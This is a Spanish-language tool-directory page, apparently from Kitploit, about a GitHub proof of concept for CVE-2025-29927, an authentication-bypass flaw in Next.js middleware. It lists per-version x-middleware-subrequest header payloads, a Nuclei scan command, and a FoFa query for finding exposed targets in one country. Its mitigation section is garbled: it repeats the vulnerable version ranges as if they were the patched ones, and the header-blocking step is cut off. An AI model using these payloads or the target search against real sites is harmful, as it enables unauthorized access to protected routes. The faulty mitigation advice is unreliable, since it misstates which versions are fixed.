Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927 — CVE-2025-29927: Vulnerabilidad de omisión de middleware en Next.js | Kitploit
Herramientas/GitHubGitHub/kh4sh3i/cve-2025-29927
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Vulnerabilidad de omisión de middleware en Next.js

Ver Repositorio
211hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir



CVE-2025-29927

CVE-2025-29927: Vulnerabilidad de evasión de middleware en Next.js Este repositorio demuestra la vulnerabilidad CVE-2025-29927 en Next.js, donde el encabezado interno x-middleware-subrequest puede utilizarse para evadir comprobaciones de middleware como la autenticación.

Versiones afectadas

Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Mitigación y remediación

  • Actualice Next.js a las versiones parcheadas:
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Si la actualización no es posible de inmediato, bloquee o elimine el encabezado x-middleware-subrequest a nivel del servidor web o del proxy:

Escenarios de impacto

  • Evasión de autorización: los atacantes pueden acceder a rutas protegidas sin la autenticación o autorización adecuada.
  • Evasión de la Política de Seguridad del Contenido (CSP): si los encabezados CSP se añaden mediante middleware, los atacantes pueden evadir estos controles de seguridad, lo que potencialmente permite ataques de cross-site scripting (XSS).
  • Denegación de servicio mediante envenenamiento de caché: en ciertas configuraciones, los atacantes podrían envenenar las cachés con contenido no autorizado evadiendo el middleware que establece los encabezados de control de caché.

Uso de la plantilla de Nuclei para nextjs-CVE-2025-29927

nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Explotación en diferentes versiones de Next.js

  • Para versiones anteriores a 12.2:
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • Para versiones 12.2 y posteriores:
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • Para versiones 13.2.0 y posteriores:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Búsqueda de objetivos con FoFa

header="x-middleware-rewrite" && country="IR"

CTF gratuito para esto

  • CTF
Descargar herramienta